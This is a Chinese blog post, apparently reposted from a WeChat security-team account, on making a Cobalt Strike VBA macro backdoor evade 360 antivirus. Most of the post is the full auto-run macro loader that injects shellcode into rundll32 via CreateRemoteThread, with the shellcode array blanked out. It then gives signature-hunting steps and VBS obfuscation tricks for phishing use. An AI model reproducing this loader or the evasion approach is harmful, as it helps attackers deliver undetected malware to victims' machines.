本次所涉及的杀毒软件主要为 360,辅助对比使用的是火绒。
我们本篇文章为了验证结果,主要针对 CobaltStrike 所生成的 vbs 宏代码来进行免杀测试,但实际上就目前杀软的查杀效果,利用CobaltStrike 的原生宏代码来进行钓鱼攻击显然不是一种方便的选择。因为vbs非常的强大以及灵活,完全可以依靠其他方式实现CobaltStrike 以及其他众多远控工具的上线操作,而且还可以拓展更多的模块。
注意:本文不会披露免杀程序,只提供测试思路,希望对各位后续探索新免杀方式提供参考依据。
先看下常规情况下的 cs vbs 后门在 360 查杀中的检测情况。
后门代码
Private Type PROCESS_INFORMATION
hProcess As Long hThread As Long dwProcessId As Long dwThreadId As Long
End Type
Private Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type
#If VBA7 Then
Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As
Long) As Long
Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As
Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long #End If
Sub Auto_Open()
Dim myByte As Long, myArray As Variant, offset As Long
Dim pInfo As PROCESS_INFORMATION
Dim sInfo As STARTUPINFO
Dim sNull As String
Dim sProc As String
#If VBA7 Then
Dim rwxpage As LongPtr, res As LongPtr
#Else
Dim rwxpage As Long, res As Long
#End If myArray = Array(xxx,xxxx,xxxx,xxx)
If Len(Environ("ProgramW6432")) > 0 Then sProc = Environ("windir") & "\SysWOW64\rundll32.exe"
Else sProc = Environ("windir") & "\System32\rundll32.exe" End If
res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo,
pInfo)
rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
For offset = LBound(myArray) To UBound(myArray) myByte = myArray(offset)
res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
Next offset
res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open() Auto_Open
End Sub
代码中的 myArray 变量值已经被我删掉了,防止有人拿我的 CS 搞事情。
CS 的宏代码采用的就是最简单的 CreateRemoteThread 方式进行进程注入,使用的是这四个 API 接口。
CreateRemoteThread 、 VirtualAllocEx 、WriteProcessMemory、CreateProcessA
使用 360 单独针对这四个接口进行查杀发现可以通过检测
将上面声明变量的部分加进去再去查杀,也是通过。
这里使用火绒对比查杀一下,火绒的查杀点在于上述 4 个 windows 接口,所以这段代码是能查杀出病毒的。
回到 360 上,以上代码均不会被查杀出后门,那么就测试后半部分。
单独查杀后半部分代码也不存在病毒,那推断就是针对全局代码进行关键特征提取来判断是否为病毒文件,那么只需要将特征完全去除掉即可。
在 vbs 中有以下几个特殊符号的用法:
_ 将一行代码变为两行
: 将两行代码变为一行
+ 将两个字符串拼接成一个字符串
‘ 单行注释这里通过基础的混淆来演示一下 vbs 语法的丰富程度原本的代码
混淆后的代码,可以通过这种方式替换常规后门 vbs 代码中的特征字符。
当然可以构造更加复杂的 payload
我们查看下混淆后的最终查杀效果。
原文始发于微信公众号(白帽子社区团队):VBS后门的免杀方式的研究
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论